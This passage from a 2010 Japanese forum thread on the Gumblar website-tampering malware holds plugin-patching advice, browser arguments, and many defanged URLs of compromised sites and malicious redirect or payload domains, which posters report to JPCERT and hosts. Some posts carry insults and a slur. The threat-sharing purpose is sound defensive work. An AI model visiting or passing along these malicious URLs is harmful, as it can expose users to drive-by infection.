> ・XP以下は念のためMicrosoft Updateに変更してアップデートする
> ■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
> URLリンク(get.adobe.com)
> ・インストール後本体をアップデート
> ヘルプ → アップデートの有無をチェック
> ・Acrobat Javascriptをオフにする
> 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
> ■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
> URLリンク(get.adobe.com)
> URLリンク(www.adobe.com)
> ・Flash Playerのバージョン確認
> URLリンク(www.adobe.com)
> URLリンク(www.adobe.com)
> ■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
> URLリンク(www.adobe.com)
> ■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
> URLリンク(www.java.com)
> ・Javaのバージョン確認
> URLリンク(www.java.com)
> ■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
> URLリンク(www.apple.com)
> ■ RealPlayerを更新 (使っていないならアンインストール)
> URLリンク(jp.real.com)
ここだけ重点にして
542:名無しさん@お腹いっぱい。
10/06/06 22:16:14
QuickTimeやRealPlayer無しで思う存分動画見られるプレイヤーがあればなあ
543:名無しさん@お腹いっぱい。
10/06/06 22:17:10
>>540
自分が踏んじゃうからこわーい><
って言ってんじゃねえよ
544:名無しさん@お腹いっぱい。
10/06/06 22:19:42
>>541 お前の理解度なんかどうでもいい
545:名無しさん@お腹いっぱい。
10/06/06 22:34:47
スタートアップの製造元、コマンド、場所項目
タスマネプロセスの説明項目
このあたりに不明とか書いてたら怪しいと思っていいのかな
546:名無しさん@お腹いっぱい。
10/06/06 23:01:02
>>521
たぶん誤検知
いかにもな難読化コードなので誤判定されるのも無理ないけど
547:名無しさん@お腹いっぱい。
10/06/06 23:05:22
>>531,533
ちょっとまさぐってみたら
XXXXXXX●ru/skank/index●php?page=3d-anime-hentai-videos
3Dアニメ変態ビデヲwwwww
※何が落ちてくるかは知らん
548:547
10/06/06 23:21:51
ちょっと追記
アクセスする毎に飛ばされる先が違う
thermalvisit●ru
awmmagazine●ru
visitthermal●ru
他にもあるかもしれん
549:名無しさん@お腹いっぱい。
10/06/07 11:35:56
>>546
Avira「HTML/Crypted.Gen」
Avast「JS:Redirector-CE [Trj] 」
Dr.Web「Trojan.MulDrop.1010」
550:名無しさん@お腹いっぱい。
10/06/07 14:26:36
535はうっかりクリックしたらどうすんだよw
551:コテハン ◆8080adndqg
10/06/07 14:34:05
【陥落サイトのURL悪用厳禁】
www●gal-love●com/
katusika●net/
d-pic●net/repo/ ←トップページ以外は相変わらず絶賛放置中
www●bbfactory●jp/
dental-mos●net/ap/14/4/
cre2cash●f01●jp/ ←<!--カス対応中w-->
www●ad-jeaayf●com/links/
www12●plala●or●jp/atakashi/sk/
elyess●hotel-prony-elysees-paris●com/ao/5/3/index●html
552:名無しさん@お腹いっぱい。
10/06/07 16:08:52
なんかめっちゃ増えてるんですけどorz
553:名無しさん@お腹いっぱい。
10/06/07 17:27:12
【悪用厳禁】
URLリンク(www)<)●haisui●com/
URLリンク(webright)<)●vaxponys●com/
JRCERTに報告しました
>>551
JPCERTに報告しました
554:名無しさん@お腹いっぱい。
10/06/07 17:28:02
http削り忘れた…
555:名無しさん@お腹いっぱい。
10/06/07 17:32:09
報告してくれるだけで十分ありがたい
次からは気をつけてね
556:名無しさん@お腹いっぱい。
10/06/07 17:44:09
Flash Player、Adobe Reader/Acrobatに新たな脆弱性、既に悪用も
URLリンク(internet.watch.impress.co.jp)
557:名無しさん@お腹いっぱい。
10/06/07 17:48:26
マジかよ
動画サイト見るのも命がけの時代か
558:名無しさん@お腹いっぱい。
10/06/07 17:53:24
俺はずっと10.1RCを使ってたから
たまたま運良く被害をまぬがれていただけらしい
559:コテハン ◆8080adndqg
10/06/07 18:09:37
>>553 乙です
過去に陥落履歴があった(ような気がする)vaxponys●comを掘ってみた・・・
【陥落サイトのURL悪用厳禁】
best-shoper●vaxponys●com/
dream-girls●vaxponys●com/
diet-mates●vaxponys●com/
rocken-house●vaxponys●com/
german-house●vaxponys●com/
rice-premium123●vaxponys●com/
wine-house●vaxponys●com/
premium-farmer●vaxponys●com/
dyson-good●vaxponys●com/
kayak-house●vaxponys●com/
event-mate●vaxponys●com/
natural-warm●vaxponys●com/
rooms-sayaka●vaxponys●com/
祝!\(^o^)/全滅
※他にもあるかも・・・
560:コテハン ◆8080adndqg
10/06/07 18:16:18
追記
■セーフ ブラウジング
vaxponys●com の診断ページ
www●google●com/safebrowsing/diagnostic?site=vaxponys●com/&hl=ja
>過去 90 日間に、このサイトの一部で不審な動きが 2 回報告されています。
>不正なソフトウェアは vaxponys●sakura●ne●jp/, supernewstuff●ru/ を含む 2 個のドメインでホストされています。
>vaxponys●sakura●ne●jp/
(;゚д゚)・・・
561:名無しさん@お腹いっぱい。
10/06/07 18:25:13
新型ってないの?
ここで報告されているのは殆どavast!で検出できるし
562:名無しさん@お腹いっぱい。
10/06/07 18:36:58
>>535のアンカーは何で危険なんだ?
専ブラでカーソルを合わせるだけなら問題ないのでは?
563:名無しさん@お腹いっぱい。
10/06/07 18:42:42
>>562
迷い込んだ初心者が信用して上から順に素直に何も疑わずクリックすることが想像される
住人の心配は全くしていない
564:名無しさん@お腹いっぱい。
10/06/07 19:03:57 BE:1365451283-PLT(19650)
>>561
Katesリバースエンジニアリングされて中身暴露されたからじゃない?
565:名無しさん@お腹いっぱい。
10/06/07 19:24:33
www.tu-han4.com/hatumo/
566:名無しさん@お腹いっぱい。
10/06/07 19:50:31
>>559
>>560
「vaxponys●sakura●ne●jp」をさくらに通報しました
>>561
取りこぼした検体を提出して検出率100%を目指すというのはどうか
>>565
>>368の時点でJRCERTに提出したんですけど、まだダメですか
もう一回通報しとこうかなあ…
567:名無しさん@お腹いっぱい。
10/06/07 22:46:06
このスレの存在自体危険だよな
568:名無しさん@お腹いっぱい。
10/06/07 22:51:14
>>567
罠リンクを罠リンクと見抜ける人間でないと(2chを使う事は)難しい
569:名無しさん@お腹いっぱい。
10/06/07 22:52:36
Silverlightってどうなの?
脆弱性報告されてたりする?
セキュリティ的にFlashよりいいのなら
ようつべも使えばいいのにと思うのだが
570:名無しさん@お腹いっぱい。
10/06/07 23:01:33
今はレジストリでしか感染確認出来ない?
571:名無しさん@お腹いっぱい。
10/06/07 23:26:52
>>567
このスレがあるから日本でのパンデミックが抑えられてるとも言える。
細々した陥落サイトを閉鎖・修正・消滅に追い込んでる人達に感謝しろよ。
572:名無しさん@お腹いっぱい。
10/06/07 23:28:45
>>570
最近出てるのは確認のしようがないらしい
駆除法もクリーンインストール(普通のウイルスやマルウェアならそこまで行きつかない最終手段)しかないって有様だしな
マスゴミや政府がザルなせいで被害は広がる一方
573:名無しさん@お腹いっぱい。
10/06/07 23:52:52
>>572
FTP以外のメール等のアカウントも抜かれるなら
迷惑メールがいっぱいくるのかな
574:名無しさん@お腹いっぱい。
10/06/07 23:55:15
確認のしようがないってことはavastでスキャンとかしてウイルスなしでも
感染してるかもしれないってことですか?
575:名無しさん@お腹いっぱい。
10/06/07 23:57:51
>>573
迷惑メールは受信だけでなく送信もありえる
それによってフリーメールアカウントなら停止させられるかもしれない
576:名無しさん@お腹いっぱい。
10/06/07 23:58:48
>>574
感染後にDLする何らかのウイルスを検出する可能性が高い
偽セキュリティソフトなんかがその典型
577:名無しさん@お腹いっぱい。
10/06/08 00:04:02
なんでこれだけ被害出てるのに、firefoxとかセキュリティーの低いブラウザ使い続けるのかわからん
IE8/9+Vista/7で保護モード使うか、ChromeのWindows版使うかすればいいのに
いまだにセキュリティー対策にIEからfirefoxにかえろとか大嘘おしえてGumblarとかに引っかかるユーザーを
量産してるアホはいますぐ腹を切るべし
578:名無しさん@お腹いっぱい。
10/06/08 00:05:56
XPなので保護モードありません><
CPUがPenIIIなのでDEPもありません><
579:名無しさん@お腹いっぱい。
10/06/08 00:09:27
>>573
アカウントと言えばYouTube、ニコ動のやつも何か利用されるのだろうか
著作物とかが勝手に違法アップロードされるとか
580:名無しさん@お腹いっぱい。
10/06/08 00:30:38
それよりもGumblar作ったやつをさっさと捕まえるなり殺害するなりしろよ
ここまでやっておいて死刑ですら生温いわ
581:名無しさん@お腹いっぱい。
10/06/08 00:30:51
firefoxで感染なんかしたことないな
script切ってない本人の問題
IEでないと見れないどこかのキムチ国ブラウザなんかいらないからw
582:名無しさん@お腹いっぱい。
10/06/08 00:31:08
テキストウラウザ最強だな
583:名無しさん@お腹いっぱい。
10/06/08 00:32:22
Windows捨てればええねん
LinuxやMacOSへGO!
584:名無しさん@お腹いっぱい。
10/06/08 00:34:43
どのブラウザなら大丈夫なんてないだろ常識的に考えて
それよりしっかりパッチ当てるなりサードパーティ製品のアップデートしろ
585:名無しさん@お腹いっぱい。
10/06/08 00:43:11
そういえばGumblarにたいしてHIPSは有効なのかね
ゼロディされたらこれが唯一の防御壁だろ
586:名無しさん@お腹いっぱい。
10/06/08 00:50:44
HIPSは有効だろうね
ドライブバイダウンロードやおかしな通信を防げる
ただし、最初に感染した時に何されたかはわからないけど
587:名無しさん@お腹いっぱい。
10/06/08 01:15:20
FirefoxにSnortライクなアドオンのFirekeeperがお手軽か
url_content, headers_content, body_contentやurl_re, headers_re, body_reで
拒否許可やアラートのルール作れるらしいから
588:名無しさん@お腹いっぱい。
10/06/08 01:28:23
最近のトレンドは、「やられても安心」っていう方向だからな
ところがfirefoxは設計が古臭く、やられにくいようにできるけど、やられたらダメっていうあいかわらずの旧タイプだな
IEやChromeは、やられても安心っていう方向に進化した
589:名無しさん@お腹いっぱい。
10/06/08 01:36:17
情報ダダ漏れのブラウザなんかいらない
590:名無しさん@お腹いっぱい。
10/06/08 03:08:26
ところが、実際にはFFが安全だったりするw
使ってれば判る事なんだが、アンチ糞は脳内だから知らないんだよ
591:あんちたった ◆MOTO.0SDfQ
10/06/08 03:13:30
>>588
( ゚Д゚)ハァ?
やられたら安全も糞もねぇ終わり。
どのブラウザも同じでしょ?
どのブラウザでもやられないようにすることが大事。
拾い食いして毒食べても平気な人間が居ないのと一緒。
592:名無しさん@お腹いっぱい。
10/06/08 05:32:40
↓この辺とか未対策だったらどうしようもないよね。
URLリンク(kb2.adobe.com)
593:名無しさん@お腹いっぱい。
10/06/08 05:55:30
OSが窓ならなw
594:593
10/06/08 06:04:10
ごめんスレ違い
595:名無しさん@お腹いっぱい。
10/06/08 06:46:28
まぁFFと書く >>590 みたいなのは火狐厨の中でも
特別に低能な情弱なんだけどね
596:名無しさん@お腹いっぱい。
10/06/08 07:02:10
>>590
FFって馬鹿じゃねーの
597:名無しさん@お腹いっぱい。
10/06/08 07:10:42
保護モード下のIEやWindowsのChromeは、レンダリングは権限の低い別プロセスで行うから、
ブラウザがセキュリティーホールでやられたとしても、さらにOSのセキュリティーホールまで
やられない限り影響をうけない
もちろん、レンダリングと同じプロセスで動くプラグインにセキュリティーホールがあってやられたとしても同様
プロセスがやられたらおしまいな火狐とは違う
598:名無しさん@お腹いっぱい。
10/06/08 07:48:33
まあそういうのにこだわってる奴ほど引っかかるんだけどな…
599:名無しさん@お腹いっぱい。
10/06/08 08:24:14
あほか
普通に使ってればこだわり以前にFxだわ
悔し紛れに恥の上塗りかよ
600:名無しさん@お腹いっぱい。
10/06/08 08:25:19
FF君は引っかかりそうだなw
601:名無しさん@お腹いっぱい。
10/06/08 09:46:17
おまいらブラウザの話になるとすぐ沸騰するのなw
このスレ的には「>>4をやっておけばおk」なんだから
ブラウザがどうのこうのって話は他でやってくれ
602:名無しさん@お腹いっぱい。
10/06/08 09:59:34
取扱注意
berkeleyhouse●co●jp
英会話の前にパソコンインストールしなおしたほうが良いね
603:名無しさん@お腹いっぱい。
10/06/08 10:19:38
[adlib's Blog: 無料で始めるサイト改ざんチェックサービス「サイトミハル(SITEMIHARU)」を開始しました。]2010年2月8日月曜日
■有料版:2万円(税別)/月
URLリンク(blog.adlibjapan.jp)
これ誤判定でしょ?
URLリンク(blog.sitemiharu.com)
URLリンク(blog.sitemiharu.com)
604:名無しさん@お腹いっぱい。
10/06/08 10:49:54
san●ron5●com/gbc
またデジロックかぁ
通報しても落ちないんだろうな
605:名無しさん@お腹いっぱい。
10/06/08 11:32:56
>>601
「~使ってる俺一番優秀、それ以外の奴はゴミ」って優越感に浸りたい奴の荒らし目的だから触る人がいる限りどうしようもないね
ここID出ないし、かといって初心者板にはガンブラー関連のスレないし
テンプレ偽造で踏ませるとか犯罪まがいも起こるしマジPC初心者には地獄
606:名無しさん@お腹いっぱい。
10/06/08 13:04:01
dear16●501●jp/deam13/
simple●703●jp/mens
607:名無しさん@お腹いっぱい。
10/06/08 13:30:04
そういえばこれどうなったの?
IEのあらゆるバージョンにローカル・ファイルへの不正アクセスを許す脆弱性
「設計上の基本特性に関わる問題であるため修正は難しい」との見解を示す
URLリンク(www.computerworld.jp)
608:名無しさん@お腹いっぱい。
10/06/08 13:31:22
「~使ってる俺一番優秀、それ以外の奴はゴミ」ってことは汚物Zでもわいたのか?
あれが居着くとアフォ発言が増えてスレが荒廃する。
609:名無しさん@お腹いっぱい。
10/06/08 13:44:39
>>606
以下にリダイレクトされるけどコードが確認できないね
suspended.503.jp/pc.php
610:名無しさん@お腹いっぱい。
10/06/08 14:44:37
>>602
メル凸したらarenaが動いてくれた様です
まだ一部感染していますが、ウイルスの駆除が始まりました
>>606
aguseで引っ掛けると「Pegel.aa」を検出、Gred及びDr.Webでは問題なし
ソースも問題ないですし、.jsなども存在せず…
リダイレクト先がphpとかそういう理由で検出してるとか?
611:名無しさん@お腹いっぱい。
10/06/08 14:54:51
>>606は運営会社が対処したんだと思う
megalodon.jp/2010-0608-1449-01/www.dan.co.uk/viewsource/index.php?url=URLリンク(webcache.googleusercontent.com)●501●jp/deam13/
612:名無しさん@お腹いっぱい。
10/06/08 16:39:04
取扱注意
www●nsc-com●co●jp
www●nagatan●co●jp
同じサーバ上で同じように改ざんされてるとは…。
コンテンツ管理者が同じなのか?
613:名無しさん@お腹いっぱい。
10/06/08 18:17:20
>>603
指定されたメールアドレスに結果が送信されるます。
日本語が不自由な・・・
614:コテハン ◆8080adndqg
10/06/08 18:26:24
【陥落サイトのURL悪用厳禁】
一件だけ投下・・
www●saiwai-estate●net ←なんか変ww
615:名無しさん@お腹いっぱい。
10/06/08 19:56:05
>>614
ページ中にこれを発見!!
reachsaw●ru:8080/meebo-com/google●com/monster●com●php
悪用禁止!!
616:名無しさん@お腹いっぱい。
10/06/09 00:05:42
>>601
その4の対策やっても、Flashの0-dayとかやられるじゃん
Flashの0-Day対策するには、別の方法使うしかない
617:名無しさん@お腹いっぱい。
10/06/09 01:36:02
>メル凸したらarenaが動いてくれた様です
…と思ったら.jsひとつ修正して動きなしってどういうことなのorz
なんかダメっぽいのでJPCERTとIPAに通報しました
>>607
Secuniaを見る限りでは其処から進展してないっぽいです
Firefoxにも脆弱性が見つかってるみたいですし、どうしたものか
>>611
なるほど、そういうことでしたか
しかしaguseはここのところおかしな事続き
>>612
JPCERTに通報、反応待ち
>>614
メル凸済み、反応待ち
618:名無しさん@お腹いっぱい。
10/06/09 03:59:56
>>607
www.microsoft.com/technet/security/bulletin/ms10-035.mspx
619:名無しさん@お腹いっぱい。
10/06/09 11:32:49
取扱注意
www●enzou●jp
620:名無しさん@お腹いっぱい。
10/06/09 12:08:10
amyou●net/pet/ ←デジロック
www●ad-jeaayf●com/links/ ←デジロック
621:名無しさん@お腹いっぱい。
10/06/09 13:12:28
www●ktm-ktm●com/tomoko/
622:名無しさん@お腹いっぱい。
10/06/09 13:19:38
dida●mbsrv●jp
623:コテハン ◆8080adndqg
10/06/09 14:46:48
【陥落サイトのURL悪用厳禁】
www●ekinavi●sakura●ne●jp/diet/
www●kamituji1●com/
www●bbfactory●jp/ ←絶賛放置中(再掲載)
stromstein●fc2web●com/
624:名無しさん@お腹いっぱい。
10/06/09 14:55:10
取扱注意
yasubei●net
625:コテハン ◆8080adndqg
10/06/09 18:39:34
【陥落サイトのURL悪用厳禁】
seikon●nes3●com
www4●atpages●jp/kessan/
掘れば掘るほど出てくる・・orz
626:名無しさん@お腹いっぱい。
10/06/09 19:54:16
山形蕎麦と炙りの焔蔵様
感染の告知は無しでしょうか・・・
グーグルで検索しているお客様は逃げていきますョ
627:名無しさん@お腹いっぱい。
10/06/09 21:06:13
googleの対応は早くてありがたいな
まぁどんどんプログラムの亜種が出てるから「全部感知!」には至ってないけど……
628:名無しさん@お腹いっぱい。
10/06/09 23:01:17
>>626
なぜ?
629:名無しさん@お腹いっぱい。
10/06/10 01:26:54
>>628
キャッシュに改ざんの刻印がある
webcache●googleusercontent●com/search?q=cache:sWB9ZGzluRsJ:www.enzou●jp/
630:名無しさん@お腹いっぱい。
10/06/10 01:47:39
>>602がGREDの解析対象外になっとるwww
631:名無しさん@お腹いっぱい。
10/06/10 04:22:43
って、あれ?
何を検索しても解析対象外になる…
632:名無しさん@お腹いっぱい。
10/06/10 09:24:12
何が起こってるんだ?
633:名無しさん@お腹いっぱい。
10/06/10 10:44:03
elyess●hotel-prony-elysees-paris●com/ao/5/3/
634:名無しさん@お腹いっぱい。
10/06/10 11:18:44
>>602の英会話スクール
ひっそり修正ですかね
635:コテハン ◆8080adndqg
10/06/10 18:15:47
【陥落サイトのURL悪用厳禁】
※8080じゃないやつ
www●alive-kanmoku●com/ansin●html
www●alive-kanmoku●com/bamen-310●html など・・・
www●acl-music●jp/ ←再掲載(改竄されすぎて絶賛崩壊中)
www●minatomo●jp/cart/CreProduct●php ←放置したまま逃げた?
iiji●biz/hirameki/
demchik●100free●com/3●html